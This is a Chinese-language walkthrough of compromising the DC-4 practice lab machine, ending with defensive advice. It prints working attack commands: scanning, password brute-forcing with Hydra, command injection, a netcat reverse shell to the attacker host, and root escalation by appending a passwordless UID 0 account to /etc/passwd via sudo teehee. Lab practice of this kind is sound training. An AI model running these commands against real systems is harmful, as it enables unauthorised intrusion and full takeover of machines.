Vulhub 练习 DC-4靶机完整复现
字数 1035 2025-08-18 11:35:59
Vulhub DC-4靶机渗透测试完整复现教程
一、环境准备
1. 工具与设备
- Kali Linux攻击机:IP地址192.168.200.4
- DC-4靶机:IP地址未知(需通过扫描发现)
- 网络配置:两台机器必须使用相同的网络连接方式(本教程使用NAT模式)
二、信息收集阶段
1. 主机发现
使用以下两种方法发现靶机IP:
# 方法一:ARP扫描
arp-scan -l
# 方法二:Nmap Ping扫描
nmap -sP 192.168.200.0/24 -T4
2. 端口扫描
发现靶机IP后(假设为192.168.200.9),进行详细端口扫描:
nmap -sV -p- 192.168.200.9
3. Web应用探测
- 使用浏览器访问靶机Web服务
- 使用whatweb进行指纹识别:
whatweb http://192.168.200.9
三、Web应用渗透
1. 密码爆破
- 发现登录页面需要admin凭证
- 使用暴力破解获得密码:
happy
2. 命令注入漏洞
- 登录后发现可执行命令的功能
- 使用Burp Suite拦截请求,发现执行的是
ls命令 - 尝试注入其他命令:
whoamiip addr
四、获取初始立足点
1. 反弹Shell
-
在Kali上启动监听:
nc -lvvp 8899 -
通过命令注入执行反弹Shell:
nc 192.168.200.3 8899 -e /bin/bash -
获取低权限Shell后,升级为交互式Shell:
python -c 'import pty;pty.spawn("/bin/bash")'
2. 横向移动
- 在
/home目录发现三个用户:charles、jim、sam - 在jim目录下发现
old-passowrd.bak文件 - 使用hydra爆破jim的SSH密码:
获得凭证:jim/jibril04hydra -l jim -P /home/kali/123.txt ssh://192.168.200.9
3. 获取charles凭证
- 检查
/var/mail目录 - 发现charles的邮件,包含密码:
^xHhA&hvim0y - 切换用户:
su charles
五、权限提升
1. 检查sudo权限
sudo -l
发现可以使用teehee命令且不需要密码
2. 利用teehee提权
-
添加root权限用户:
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd- 用户名:admin
- UID/GID设置为0(root权限)
- 无密码
-
切换到admin用户:
su admin
六、关键点总结
-
信息收集:ARP和Nmap扫描是发现目标的基础
-
Web渗透:密码爆破和命令注入是突破口
-
权限提升路径:
- Web命令注入→低权限Shell
- 密码爆破→jim用户
- 邮件信息→charles用户
- Sudo滥用→root权限
-
提权技巧:
- 利用可写/etc/passwd的特性添加root用户
- 注意
teehee命令的-a参数等同于>>重定向
七、防御建议
- 加强密码策略,避免使用弱密码
- 限制sudo权限,避免无密码执行危险命令
- 对用户输入进行严格过滤,防止命令注入
- 定期检查/var/mail等敏感目录
- 监控/etc/passwd文件的异常修改